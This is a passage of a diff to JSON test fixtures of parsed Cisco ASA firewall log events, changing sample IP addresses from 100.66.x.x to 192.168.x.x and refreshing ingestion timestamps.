 },
 "destination": {
 "port": 8306,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1302,
@@ -15867,7 +15867,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -15875,8 +15875,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111985205Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306",
+ "ingested": "2021-12-09T13:31:36.364273200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -15909,8 +15909,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -15945,7 +15945,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -15954,8 +15954,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111987070Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)",
+ "ingested": "2021-12-09T13:31:36.364279300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -15971,7 +15971,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11837",
 "source_interface": "outside",
 "mapped_destination_port": 1302
@@ -16009,8 +16009,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111988723Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364284100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16056,8 +16056,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111990375Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364305800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16103,8 +16103,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111992065Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364356600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16150,8 +16150,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111993775Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364361800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16197,8 +16197,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111995514Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364366Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16244,8 +16244,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111997193Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364371200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16291,8 +16291,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.111998878Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364375800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16338,8 +16338,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112000603Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364380100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16385,8 +16385,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112002247Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364384800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16432,8 +16432,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112004024Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364388900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16479,8 +16479,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112005769Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364393200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16526,8 +16526,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112007456Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364398200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16573,8 +16573,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112009133Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364402900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16620,8 +16620,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112010826Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364407200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16667,8 +16667,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112012468Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364411700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16693,8 +16693,8 @@
 },
 "destination": {
 "port": 8308,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1304,
@@ -16734,7 +16734,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -16742,8 +16742,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112014142Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308",
+ "ingested": "2021-12-09T13:31:36.364416800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -16776,8 +16776,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.205.99",
- "ip": "100.66.205.99"
+ "address": "192.168.205.99",
+ "ip": "192.168.205.99"
 },
 "tags": [
 "preserve_original_event"
@@ -16812,7 +16812,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.205.99",
+ "192.168.205.99",
 "172.31.98.44"
 ]
 },
@@ -16821,8 +16821,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112015960Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)",
+ "ingested": "2021-12-09T13:31:36.364421400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -16838,7 +16838,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.205.99",
+ "mapped_source_ip": "192.168.205.99",
 "connection_id": "11840",
 "source_interface": "outside",
 "mapped_destination_port": 1304
@@ -16876,8 +16876,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112017591Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364425500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16923,8 +16923,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112019269Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364430300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -16954,8 +16954,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.0.124",
- "ip": "100.66.0.124"
+ "address": "192.168.0.124",
+ "ip": "192.168.0.124"
 },
 "tags": [
 "preserve_original_event"
@@ -16990,7 +16990,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.0.124",
+ "192.168.0.124",
 "172.31.98.44"
 ]
 },
@@ -16999,8 +16999,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112020935Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:31:36.364436400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -17016,7 +17016,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.0.124",
+ "mapped_source_ip": "192.168.0.124",
 "connection_id": "11841",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -17038,8 +17038,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.160.2",
- "ip": "100.66.160.2"
+ "address": "192.168.160.2",
+ "ip": "192.168.160.2"
 },
 "tags": [
 "preserve_original_event"
@@ -17074,7 +17074,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.160.2",
+ "192.168.160.2",
 "172.31.98.44"
 ]
 },
@@ -17083,8 +17083,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112022684Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:31:36.364441600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -17100,7 +17100,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.160.2",
+ "mapped_source_ip": "192.168.160.2",
 "connection_id": "11842",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -17122,8 +17122,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.0.124",
- "ip": "100.66.0.124"
+ "address": "192.168.0.124",
+ "ip": "192.168.0.124"
 },
 "tags": [
 "preserve_original_event"
@@ -17158,7 +17158,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.0.124",
+ "192.168.0.124",
 "172.31.98.44"
 ]
 },
@@ -17168,8 +17168,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:02.112024333Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318",
+ "ingested": "2021-12-09T13:31:36.364446400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -17206,8 +17206,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.160.2",
- "ip": "100.66.160.2"
+ "address": "192.168.160.2",
+ "ip": "192.168.160.2"
 },
 "tags": [
 "preserve_original_event"
@@ -17242,7 +17242,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.160.2",
+ "192.168.160.2",
 "172.31.98.44"
 ]
 },
@@ -17252,8 +17252,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:02.112026121Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
+ "ingested": "2021-12-09T13:31:36.364451300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -17285,8 +17285,8 @@
 },
 "destination": {
 "port": 8309,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1305,
@@ -17326,7 +17326,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -17334,8 +17334,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112027811Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309",
+ "ingested": "2021-12-09T13:31:36.364455800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -17368,8 +17368,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -17404,7 +17404,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -17413,8 +17413,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112029475Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)",
+ "ingested": "2021-12-09T13:31:36.364459500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -17430,7 +17430,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.124.24",
+ "mapped_source_ip": "192.168.124.24",
 "connection_id": "11843",
 "source_interface": "outside",
 "mapped_destination_port": 1305
@@ -17468,8 +17468,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112031140Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364464200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17515,8 +17515,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112032811Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364470200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17562,8 +17562,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112034532Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364476300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17609,8 +17609,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112036270Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364482300Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17656,8 +17656,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112037910Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364488500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17703,8 +17703,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112041652Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364493100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17750,8 +17750,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:02.112043342Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30",
+ "ingested": "2021-12-09T13:31:36.364499100Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30",
 "code": "305012",
 "kind": "event",
 "action": "firewall-rule",
@@ -17781,8 +17781,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -17817,7 +17817,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -17828,8 +17828,8 @@
 "severity": 6,
 "duration": 4000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-07-19T09:06:02.112045086Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I",
+ "ingested": "2021-12-09T13:31:36.364504400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:52.000Z",
@@ -17866,8 +17866,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -17901,7 +17901,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -17910,8 +17910,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112046841Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364509600Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
 "action": "firewall-rule",
@@ -17947,8 +17947,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.124.24",
- "ip": "100.66.124.24"
+ "address": "192.168.124.24",
+ "ip": "192.168.124.24"
 },
 "tags": [
 "preserve_original_event"
@@ -17982,7 +17982,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.124.24",
+ "192.168.124.24",
 "172.31.98.44"
 ]
 },
@@ -17991,8 +17991,8 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:02.112048556Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]",
+ "ingested": "2021-12-09T13:31:36.364513400Z",
